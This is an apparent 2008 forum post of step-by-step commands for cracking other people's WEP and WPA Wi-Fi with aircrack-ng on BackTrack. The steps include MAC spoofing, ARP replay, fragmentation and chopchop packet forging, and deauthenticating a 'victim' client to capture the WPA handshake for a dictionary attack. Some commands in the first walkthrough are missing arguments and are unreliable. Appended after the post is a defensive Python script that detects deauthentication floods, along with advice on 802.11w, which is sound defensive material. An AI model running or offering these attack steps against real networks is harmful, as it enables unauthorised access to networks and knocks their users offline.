WEP cracking in a nutshell (NEWCOMERS PLEASE READ)

Posted at Saturday, August 09, 2008


I found that some of the commands differ slightly from BackTrack 2 to BackTrack 3.
Either way, here's a step by step.
Once you have the BackTrack ISO CD in the tray and your network adapter plugged into the USB (I use a USB network adapter), boot up your computer.
Next to the K that resembles the Start menu in Windows there should be a little black window; click on it and it pulls up what's called a terminal (similar to DOS for Windows).
Now I'll go into what to type in the terminals. I usually have about 4 of these windows open, and I'll identify which window you type in by writing "t1, t2, t3, etc." before each instruction.
Where I type <> you insert information; where I type [enter] you hit enter.
You'll get it as we go along.

Also, when you see your victim's BSSID you will want to copy it and then paste it where needed, since a BSSID is pretty long. For those who hate using the mouse and use hotkeys, the paste function is shift+insert in Linux.

t1:
type: airmon-ng stop ath0 (this will let you see the devices you're using, ex: rausb0) [enter]
ifconfig [enter] <-- I don't remember if this [enter] goes here; you can try it with or without and see which works
macchanger --mac 00:11:22:33:44:55 (this changes your MAC address in order to cause some confusion) [enter]
airmon-ng start [enter]

t2: airodump-ng (scans for available wireless networks; press ctrl+c to pause) [enter]
airodump-ng -c -w --bssid [enter]
(let this window run throughout the entire crack)
Basically what you just did in t2 was scan the available networks and then tell your computer: OK, we're going to make a catch file in this location (this is where I said to name a catch file) and we're going to read packets of information in this location. What you're doing to crack the WEP encryption is sending information (packets) to whatever network you want to crack, and that network is sending information back. The files we want are not necessarily the packets but the ARPs; that's what aircrack actually analyzes in order to crack the WEP.

t3:
aireplay-ng -1 0 -a -h 00:11:22:33:44:55 [enter]
aireplay-ng -3 -b -h 00:11:22:33:44:55 [enter]

t4:
aircrack-ng -n 64 --bssid -01.cap

For the catch file part: let's say I named my catch file "hack"; I would type in hack-01.cap.


And that's it, you should have your WEP passphrase.

Also a little something I noticed; though not true for all networks, it's true for many networks around my way....
I noticed the BSSID is often the same as the passphrase, so just MAYBE you would want to try the BSSID before doing the rest of the hack.

WEP Crack Basics:
bt ~ # iwconfig (check wireless card name - we will assume ath0)
bt ~ # airmon-ng stop ath0
bt ~ # airmon-ng start ath0
bt ~ # airodump-ng -w capture -c 1 ath0 (writes to file "capture" on channel 1, as specified)
New terminal (leave other one open)
bt ~ # macchanger ath0 (note down the MAC address)
bt ~ # aireplay-ng -1 0 -e NETWORK -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0 (where the AA:BB:etc. is the access point's MAC address, also seen as the BSSID in the first terminal [airodump] window, and the second GG:HH:etc. is your own MAC address as seen in the macchanger window)

Section for when clients are attached to the network:
bt ~ # aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0

Section for when no clients attached:
Method 1-
bt ~ # aireplay-ng -5 -b AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0
Answer y for yes when prompted. Note down the names of two files: the fragment-xxx-xxxxxx.xor file and the replay_src-xxx-xxxxxx.cap file.
bt ~ # packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w replay_src-xxxx-xxxxxx.cap
bt ~ # aireplay-ng -2 -r replay_src-xxxx-xxxxxx.cap ath0

Method 2-
bt ~ # aireplay-ng -4 -h GG:HH:II:JJ:KK:LL -b AA:BB:CC:DD:EE:FF ath0
Answer y for yes when prompted. Note down the names of two files: the fragment-xxx-xxxxxx.xor file and the replay_src-xxx-xxxxxx.cap file.
bt ~ # packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w replay_src-xxxx-xxxxxx.cap
bt ~ # aireplay-ng -2 -r replay_src-xxxx-xxxxxx.cap ath0


Cracking the key:
bt ~ # aircrack-ng (-z) capture*.cap (the -z is in brackets because it can be used if you have captured ARP requests, and is faster - so try this first, but if it doesn't work, remove it) (the capture*.cap is just using the file that you captured to - this can be run whilst capturing)




WPA Cracking:
bt ~ # airmon-ng stop ath0
bt ~ # airmon-ng start ath0
bt ~ # airodump-ng -w wpa -c 1 ath0
New Terminal:
bt ~ # aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c MM:NN:OO:PP:QQ:RR ath0 (where the MM:NN:etc. is a client's MAC address - this forces them to disconnect, giving us the "handshake" that we want, which contains the password, otherwise you just have to wait for a client to connect)
bt ~ # aircrack-ng -w dictionary.lst wpa*.cap (dictionary.lst is a dictionary/wordfile, as WPA has to be cracked with one of these. wpa*.cap is the capture file)
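The deauthentication step above is also what a network owner can watch for: a spoofed deauth/disassoc burst against a client is noisy on the air. The following script is an added, defender-side example written for this page (it is not from the original post or from the aircrack-ng project). It parses raw 802.11 management frame headers, counts deauthentication and disassociation frames per (BSSID, sender) in a sliding time window, and flags senders that exceed a threshold. The sample frames, the client addresses, and the window/threshold values are all constructed assumptions; the BSSID AA:BB:CC:DD:EE:FF is the page's own placeholder.

```python
"""Flag deauthentication / disassociation floods in raw 802.11 management frames.

Added example for this page. The sample frames below are constructed test
data, not a real capture; the window and threshold are assumed tuning values.
"""
import struct
from collections import defaultdict

MGMT_HDR_LEN = 24          # FC(2) + duration(2) + addr1/2/3(18) + seq ctrl(2)
DEAUTH_SUBTYPE = 0x0C      # management subtype 12
DISASSOC_SUBTYPE = 0x0A    # management subtype 10
BEACON_SUBTYPE = 0x08


def parse_mgmt_frame(frame: bytes):
    """Return (subtype, addr1, addr2, addr3, reason_code) for a management
    frame, or None for anything that is not a version-0 management frame."""
    if len(frame) < MGMT_HDR_LEN:
        return None
    fc0 = frame[0]
    version = fc0 & 0x03
    ftype = (fc0 >> 2) & 0x03
    subtype = (fc0 >> 4) & 0x0F
    if version != 0 or ftype != 0:        # type 0 == management
        return None
    addr1 = frame[4:10].hex(":")           # receiver
    addr2 = frame[10:16].hex(":")          # transmitter (spoofable)
    addr3 = frame[16:22].hex(":")          # BSSID
    reason = None
    if subtype in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE) and len(frame) >= MGMT_HDR_LEN + 2:
        reason = struct.unpack_from("<H", frame, MGMT_HDR_LEN)[0]
    return subtype, addr1, addr2, addr3, reason


def find_deauth_floods(events, window=10.0, threshold=5):
    """events: iterable of (timestamp_seconds, raw_frame_bytes).
    Returns {(bssid, sender): peak_count} for every sender that emitted at
    least `threshold` deauth/disassoc frames inside any `window` seconds."""
    per_sender = defaultdict(list)
    for ts, frame in sorted(events, key=lambda e: e[0]):
        parsed = parse_mgmt_frame(frame)
        if parsed is None:
            continue
        subtype, _addr1, addr2, addr3, _reason = parsed
        if subtype in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            per_sender[(addr3, addr2)].append(ts)

    alerts = {}
    for key, stamps in per_sender.items():
        start, peak = 0, 0
        for end in range(len(stamps)):         # sliding window over sorted times
            while stamps[end] - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[key] = peak
    return alerts


# --- constructed sample data -------------------------------------------------
def _mgmt_frame(subtype, addr1, addr2, addr3, reason=None):
    """Build a minimal management frame header as a test fixture (constructed)."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    hdr = bytes([subtype << 4, 0x00]) + b"\x00\x00" + mac(addr1) + mac(addr2) + mac(addr3) + b"\x00\x00"
    if reason is not None:
        hdr += struct.pack("<H", reason)
    return hdr


AP = "aa:bb:cc:dd:ee:ff"          # placeholder BSSID from the page
CLIENT = "02:00:00:00:00:01"      # constructed client address
OTHER_AP = "aa:bb:cc:00:00:02"    # constructed second BSSID

SAMPLE_EVENTS = (
    [(0.0, _mgmt_frame(BEACON_SUBTYPE, "ff:ff:ff:ff:ff:ff", AP, AP))]              # benign beacon
    + [(100.0 + 0.2 * i, _mgmt_frame(DEAUTH_SUBTYPE, CLIENT, AP, AP, reason=7))    # 8 deauths in 1.4 s
       for i in range(8)]
    + [(500.0, _mgmt_frame(DEAUTH_SUBTYPE, "02:00:00:00:00:09", OTHER_AP, OTHER_AP, reason=3))]  # single, normal
)

if __name__ == "__main__":
    for (bssid, sender), count in find_deauth_floods(SAMPLE_EVENTS).items():
        print(f"ALERT: {count} deauth/disassoc frames from {sender} on BSSID {bssid} within 10 s")
```

On the sample data only the burst against the client is reported; the lone deauth on the second BSSID stays under the threshold. In practice the frames would come from a monitor-mode capture (the same kind of capture airodump-ng writes), and the root fix is on the network side: WPA2/WPA3 with Protected Management Frames (802.11w) makes spoofed deauthentication frames fail integrity checks, and WEP should not be deployed at all.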
